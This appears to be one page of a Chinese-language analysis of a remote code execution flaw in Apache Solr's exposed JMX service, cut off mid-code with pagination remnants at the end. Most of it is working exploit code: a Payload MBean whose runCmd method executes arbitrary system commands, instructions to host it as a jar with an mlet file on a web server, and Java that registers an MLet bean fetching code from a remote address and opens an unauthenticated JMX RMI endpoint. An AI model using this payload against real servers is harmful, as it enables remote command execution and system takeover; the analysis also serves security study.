Apache Solr 之JMX远程代码漏洞分析

我们先编写一个Payload的MBean，并将其打包成jar包。
public interface PayloadMBean {
    public String runCmd(String cmd) throws IOException, InterruptedException;
}
public class Payload implements PayloadMBean {
    @Override
    public String runCmd(String cmd) throws IOException, InterruptedException {
        Runtime runtime = Runtime.getRuntime();
        Process process = runtime.exec(cmd);
        BufferedReader stdInput = new BufferedReader(new InputStreamReader(process.getInputStream()));
        BufferedReader stdError = new BufferedReader(new InputStreamReader(process.getErrorStream()));
        String stdout_data = "";
        String strtmp;
        while ((strtmp = stdInput.readLine()) != null) {
            stdout_data += strtmp + "/n";
        }
        while ((strtmp = stdError.readLine()) != null) {
            stdout_data += strtmp + "/n";
        }
        process.waitFor();
        return stdout_data;
    }
}
再创建一个名为mlet的文件，内容如下：
这个文件是给getMBeansFromURL函数使用的，通过该文件，getMBeansFromURL会到远程下载JMXPayload.jar文件。
将JMXPayload.jar和mlet放在网站同一目录下。
将mletMBean添加到MBeanServer中，代码如下：
public class RemoteMbean {
    public static void main(String[] args){
        try{
            MBeanServer mBeanServer = ManagementFactory.getPlatformMBeanServer();
            //---------------------------------------------
            //local mbean
            System.out.println("Register Hello bean...");
            HelloWorld hello = new HelloWorld();
            ObjectName objectHelloName = new ObjectName("JMXHello:name=hello");
            mBeanServer.registerMBean(hello, objectHelloName);
            //remote mbean
            System.out.println("Register MLet bean...");
            MLet mLet = new MLet();
            ObjectName objectNameMLet = new ObjectName("JMXMLet:type=MLet");
            mBeanServer.registerMBean(mLet, objectNameMLet);
            //mLet.getMBeansFromURL("http://192.168.1.110:8080/mlet");
            //-----------------------------------------------------------------
            //mBeanServer.invoke(evilObject.getObjectName(), "getMBeansFromURL", new Object[] {"http://192.168.1.110:8080/mlet"}, new String[] {String.class.getName()});
            //这句话非常重要，不能缺少！注册一个端口，绑定url后，客户端就可以使用rmi通过url方式来连接JMXConnectorServer
            Registry registry = LocateRegistry.createRegistry(1099);
            //构造JMXServiceURL
            JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://localhost:1099/jmxrmi");
            //创建JMXConnectorServer
            JMXConnectorServer jmxConnectorServer = JMXConnectorServerFactory.newJMXConnectorServer(jmxServiceURL, null, mBeanServer);
            //启动
            jmxConnectorServer.start();

上一页  [1] [2] [3] [4]  下一页

 5/5   首页 上一页 3 4 5